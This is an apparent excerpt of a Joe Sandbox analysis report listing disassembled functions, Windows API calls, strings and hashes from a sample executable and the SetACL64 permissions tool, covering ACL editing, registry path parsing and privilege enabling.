Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
Instruction ID: 86827d460d6d0210cfbc43ab248bfd1705f6cbab4bd02b4ce4b4e0dc829d3a13
Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
Instruction Fuzzy Hash: 2EE012334012305BC6215F56ED04B5AB778AF55B26F09813FE940BB26287786C438FD8

Function 00405E4F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3Dut8dFCwD.exe,C:\Users\user\Desktop\3Dut8dFCwD.exe,80000000,00000003), ref: 00405E55
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3Dut8dFCwD.exe,C:\Users\user\Desktop\3Dut8dFCwD.exe,80000000,00000003), ref: 00405E65

Strings

C:\Users\user\Desktop, xrefs: 00405E4F

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: 4264e746bbe9179bf63afe9cfc5b53a917ba9e4059aba7f94742f87ad442e0a4
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: 73D0A7B3400930DAC312A704ED00D9F73ECEF5234474A4466E881A7169D7785E8186EC

Function 00405F89 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FB1
CharNextA.USER32(00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FC2
lstrlenA.KERNEL32(00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: 8db07108f343804323cb09528c583574f267d9896fc780fa7d439bc94861dd43
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: 1EF09631104519FFCB029FA5DE00D9EBBA8EF45350B2540B9F840F7250D678EE019BA9

Analysis Process: SetACL64.exePID: 6432, Parent PID: 5068COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	38.1%
Total number of Nodes:	1582
Total number of Limit Nodes:	34

Executed Functions

Function 00007FF69705BC40 Relevance: 151.2, APIs: 76, Strings: 9, Instructions: 2433COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32 ref: 00007FF69705CF81
GetLastError.KERNEL32 ref: 00007FF69705CF8B
GetAce.ADVAPI32 ref: 00007FF69705CFCA
DeleteAce.ADVAPI32 ref: 00007FF69705CFE4
GetAclInformation.ADVAPI32 ref: 00007FF69705D03D
GetLastError.KERNEL32 ref: 00007FF69705D047
GetLastError.KERNEL32 ref: 00007FF69705D05B
GetAce.ADVAPI32 ref: 00007FF69705D09A
DeleteAce.ADVAPI32 ref: 00007FF69705D0C8
GetAclInformation.ADVAPI32 ref: 00007FF69705D122
GetLastError.KERNEL32 ref: 00007FF69705D12C
GetAce.ADVAPI32 ref: 00007FF69705D16A
DeleteAce.ADVAPI32 ref: 00007FF69705D188
GetAclInformation.ADVAPI32 ref: 00007FF69705D1E5
GetLastError.KERNEL32 ref: 00007FF69705D1EF
GetAce.ADVAPI32 ref: 00007FF69705D22A
DeleteAce.ADVAPI32 ref: 00007FF69705D258
GetAclInformation.ADVAPI32 ref: 00007FF69705D2CD
GetLastError.KERNEL32 ref: 00007FF69705D2D7
GetAce.ADVAPI32 ref: 00007FF69705D30A
DeleteAce.ADVAPI32 ref: 00007FF69705D330
GetAclInformation.ADVAPI32 ref: 00007FF69705D39E
GetLastError.KERNEL32 ref: 00007FF69705D3A8
IsValidSid.ADVAPI32 ref: 00007FF69705BD43

Part of subcall function 00007FF69706EC20: IsValidSid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF697070410), ref: 00007FF69706EC37
Part of subcall function 00007FF69706EC20: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF697070410), ref: 00007FF69706EC44
Part of subcall function 00007FF69706EC20: CopySid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF697070410), ref: 00007FF69706EC68

IsValidSid.ADVAPI32 ref: 00007FF69705BD7C
LocalFree.KERNEL32 ref: 00007FF69705E358
LocalFree.KERNEL32 ref: 00007FF69705E368
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E41F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E425
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E42B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E431
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E437
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E43D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E443
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E449

Part of subcall function 00007FF69704BF60: GetLastError.KERNEL32 ref: 00007FF69704BFCE

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E44F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E455
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E461
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E467
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E46D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E479
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E47F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E485
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E491
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E497
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E49D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E4A3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E4A9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E4B5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E4BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E4C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E4C7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E4CD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E4D9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E4DF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E4E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E4EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E4F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E4FD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E503
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E509
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E515
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E51B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705E521

Strings

> because a filter keyword matched., xrefs: 00007FF69705C152
SetEntriesInAcl for DACL of <, xrefs: 00007FF69705D9BF
Processing ACL of: <, xrefs: 00007FF69705C35C
Writing SD to <, xrefs: 00007FF69705E0DD
> failed with: , xrefs: 00007FF69705C8AD, 00007FF69705CB3A, 00007FF69705D9D7, 00007FF69705DCA9, 00007FF69705E0F7
SetEntriesInAcl for SACL of <, xrefs: 00007FF69705DC91
Omitting ACL of: <, xrefs: 00007FF69705C138
Write2SD, xrefs: 00007FF69705C1AF, 00007FF69705C3D8, 00007FF69705C924, 00007FF69705CBB1, 00007FF69705DA4E, 00007FF69705DD20, 00007FF69705E16E
Reading the SD from <, xrefs: 00007FF69705C893, 00007FF69705CB20

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Information$Delete$Valid$FreeLocal$CopyLength
String ID: > because a filter keyword matched.$> failed with: $Omitting ACL of: <$Processing ACL of: <$Reading the SD from <$SetEntriesInAcl for DACL of <$SetEntriesInAcl for SACL of <$Write2SD$Writing SD to <
API String ID: 3366768055-1688761767
Opcode ID: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
Instruction ID: 6306c4e6f850d7b91ce2ac49f02d2e4c551307b0e80ea8e51162b42812bedbc9
Opcode Fuzzy Hash: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
Instruction Fuzzy Hash: BA33AEB2A1978285EB708F26E8447AD23A1FB44BD8F405676DA5DC7BD9DF38E584C300

Function 00007FF69705A350 Relevance: 54.2, APIs: 16, Strings: 14, Instructions: 1740registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF697070C18: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF697070C35
Part of subcall function 00007FF697070C18: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF697070C58
Part of subcall function 00007FF697070C18: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF697070CF3

SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF69705B36E
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF69705B461
RegConnectRegistryW.ADVAPI32 ref: 00007FF69705B530
RegOpenKeyExW.KERNELBASE ref: 00007FF69705B57A
RegCreateKeyExW.KERNELBASE ref: 00007FF69705B5D7
RegCloseKey.ADVAPI32 ref: 00007FF69705B66A
RegCloseKey.ADVAPI32 ref: 00007FF69705B68E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705B6FE
RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF69705B812
RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF69705B913
RegCloseKey.ADVAPI32 ref: 00007FF69705B935
RegCloseKey.ADVAPI32 ref: 00007FF69705B9EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705BC21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705BC27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705BC2D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705BC33

Strings

hkey_classes_root, xrefs: 00007FF69705B139
classes_root, xrefs: 00007FF69705B256, 00007FF69705B363
RegKeyFixPathAndOpen, xrefs: 00007FF69705B610
hku, xrefs: 00007FF69705ABF5
hkcr, xrefs: 00007FF69705B012
machine, xrefs: 00007FF69705AA18, 00007FF69705AB7F
hkey_users, xrefs: 00007FF69705AD15
hkey_current_user, xrefs: 00007FF69705B3C9
users, xrefs: 00007FF69705AE38, 00007FF69705AF9F
hkcu, xrefs: 00007FF69705B39A
hklm, xrefs: 00007FF69705A7D8
hkey_local_machine, xrefs: 00007FF69705A8F8
Unintentionally the following registry key was created: <, xrefs: 00007FF69705B5E9
current_user, xrefs: 00007FF69705B3F6, 00007FF69705B456

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Close$EnumLockitSimpleString::operator=std::_$ConnectCreateLockit::_Lockit::~_OpenRegistrySetgloballocalestd::locale::_
String ID: RegKeyFixPathAndOpen$Unintentionally the following registry key was created: <$classes_root$current_user$hkcr$hkcu$hkey_classes_root$hkey_current_user$hkey_local_machine$hkey_users$hklm$hku$machine$users
API String ID: 2754268630-3593729730
Opcode ID: 85943aa65972b4427093ec2e370a72c4f5bc068b0337142737c3b556697a55eb
Instruction ID: 69d1622c9f0a6c6696e0a30b9ad2c771be3585696a72fccb967d08fa1276331f
Opcode Fuzzy Hash: 85943aa65972b4427093ec2e370a72c4f5bc068b0337142737c3b556697a55eb
Instruction Fuzzy Hash: C5F2C2A2B09B5285EF20DB66E4442BD27A1FB84BC8F444176DA4ED77A9EF7CE444C340

Function 00007FF697066B2A Relevance: 39.1, APIs: 21, Strings: 1, Instructions: 609registryfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF697066CF4
GetKernelObjectSecurity.ADVAPI32 ref: 00007FF697066D6D
GetLastError.KERNEL32 ref: 00007FF697066D8E
GetKernelObjectSecurity.ADVAPI32 ref: 00007FF697066E07
CloseHandle.KERNEL32 ref: 00007FF697066E30
RegCloseKey.ADVAPI32 ref: 00007FF697066E43
GetNamedSecurityInfoW.ADVAPI32 ref: 00007FF697066F15
MakeAbsoluteSD.ADVAPI32 ref: 00007FF697067021
GetLastError.KERNEL32 ref: 00007FF697067027
GetLastError.KERNEL32 ref: 00007FF697067032
MakeAbsoluteSD.ADVAPI32 ref: 00007FF6970671D8
IsValidSid.ADVAPI32 ref: 00007FF6970671E9
IsValidSid.ADVAPI32 ref: 00007FF69706721B
LocalFree.KERNEL32 ref: 00007FF69706724F
IsValidSecurityDescriptor.ADVAPI32 ref: 00007FF69706726F
GetLastError.KERNEL32 ref: 00007FF697067347
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706743A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697067440
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697067446
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706744C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697067452

Strings

SeSecurityPrivilege, xrefs: 00007FF697066B73

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastSecurity$Valid$AbsoluteCloseKernelMakeObject$CreateDescriptorFileFreeHandleInfoLocalNamed
String ID: SeSecurityPrivilege
API String ID: 3247214862-2333288578
Opcode ID: 229e38693b3d67cb55a7457fbf6a30184df57e283c32ee218c02f652205318e6
Instruction ID: 7f81a0bd94d3ac2e8c6de0b894709dc50018673b6a1b9435382beca14188fb49
Opcode Fuzzy Hash: 229e38693b3d67cb55a7457fbf6a30184df57e283c32ee218c02f652205318e6
Instruction Fuzzy Hash: 0942AFA2B19B4286FB249B25D4643AD33A2FB84BC8F405275DA4CD7B99DF7CE590C340

Function 00007FF697053A5E Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 464
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE ref: 00007FF697053A86
GetLastError.KERNEL32 ref: 00007FF697053A90
CloseHandle.KERNEL32 ref: 00007FF697053A9F
GetLastError.KERNEL32 ref: 00007FF697053AA9
CloseHandle.KERNEL32 ref: 00007FF697053AB6
GetCurrentProcess.KERNEL32 ref: 00007FF697053CC0
OpenProcessToken.ADVAPI32 ref: 00007FF697053CD3
GetLastError.KERNEL32 ref: 00007FF697053CDD

Strings

Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF697053B7A
Prepare, xrefs: 00007FF697053BAA, 00007FF697053E67, 00007FF697054124
Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF697053E37
SeTakeOwnershipPrivilege, xrefs: 00007FF697053F39
Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6970540F4
SeRestorePrivilege, xrefs: 00007FF697053C7C

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
API String ID: 637398405-1541018277
Opcode ID: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
Instruction ID: 4c89f5db6292328e632d4a181857805162a15b7f3fc1d2530693f7eb65f79159
Opcode Fuzzy Hash: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
Instruction Fuzzy Hash: 862274B2B1878281EE248B65F4443A9A761FB847E4F505235EA9DC3BE9DF7CE084C700

Function 00007FF69706E4B0 Relevance: 21.5, APIs: 11, Strings: 1, Instructions: 483
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSidToSidW.ADVAPI32 ref: 00007FF69706E511
LocalFree.KERNEL32 ref: 00007FF69706E52E
DsGetDcNameW.NETAPI32 ref: 00007FF69706E891
NetApiBufferFree.NETAPI32 ref: 00007FF69706E90B

Part of subcall function 00007FF697070C18: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF697070C35
Part of subcall function 00007FF697070C18: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF697070C58
Part of subcall function 00007FF697070C18: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF697070CF3

Part of subcall function 00007FF69706F3C0: LookupAccountNameW.ADVAPI32 ref: 00007FF69706F44D
Part of subcall function 00007FF69706F3C0: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF69706E9EF), ref: 00007FF69706F453
Part of subcall function 00007FF69706F3C0: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF69706E9EF), ref: 00007FF69706F45E

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706EBEF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706EBFB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706EC01
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706EC07
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706EC0D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706EC13
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706EC19

Strings

computername, xrefs: 00007FF69706E73B

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorFreeLastLockitNamestd::_$AccountBufferConvertLocalLockit::_Lockit::~_LookupSetgloballocaleStringstd::locale::_
String ID: computername
API String ID: 1703289946-1800712684
Opcode ID: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
Instruction ID: 6f0c5b91ab227f018d887acecc5ba293cab06b2cf846fc49f35c31cc1162bac4
Opcode Fuzzy Hash: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
Instruction Fuzzy Hash: DA229CA2B14B5285EB208BA8D8583AD37B1FB40BD8F405675DE5DD7AD9EF38E581C300

Function 00007FF697053D1B Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE ref: 00007FF697053D43
GetLastError.KERNEL32 ref: 00007FF697053D4D
CloseHandle.KERNEL32 ref: 00007FF697053D5C
GetLastError.KERNEL32 ref: 00007FF697053D66
CloseHandle.KERNEL32 ref: 00007FF697053D73
GetCurrentProcess.KERNEL32 ref: 00007FF697053F7D
OpenProcessToken.ADVAPI32 ref: 00007FF697053F90
GetLastError.KERNEL32 ref: 00007FF697053F9A

Strings

Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF697053E37
Prepare, xrefs: 00007FF697053E67, 00007FF697054124
SeTakeOwnershipPrivilege, xrefs: 00007FF697053F39
Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6970540F4

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: Prepare$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeTakeOwnershipPrivilege
API String ID: 637398405-1701055250
Opcode ID: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
Instruction ID: aebdf65cfef575b8a6928bf485d928afea3b4c6f5fd1b9adbad9847ecb2eb339
Opcode Fuzzy Hash: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
Instruction Fuzzy Hash: 8DE160B2B1878281EE248B65F4443A9A361FB947E4F505235EA5DC7BE8DFBCE184C700

Function 00007FF69704D304 Relevance: 16.8, APIs: 11, Instructions: 288
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF69704D335
GetCurrentThreadId.KERNEL32 ref: 00007FF69704D35F
GetUserNameExW.SECUR32 ref: 00007FF69704D39C
GetLastError.KERNEL32 ref: 00007FF69704D3A6
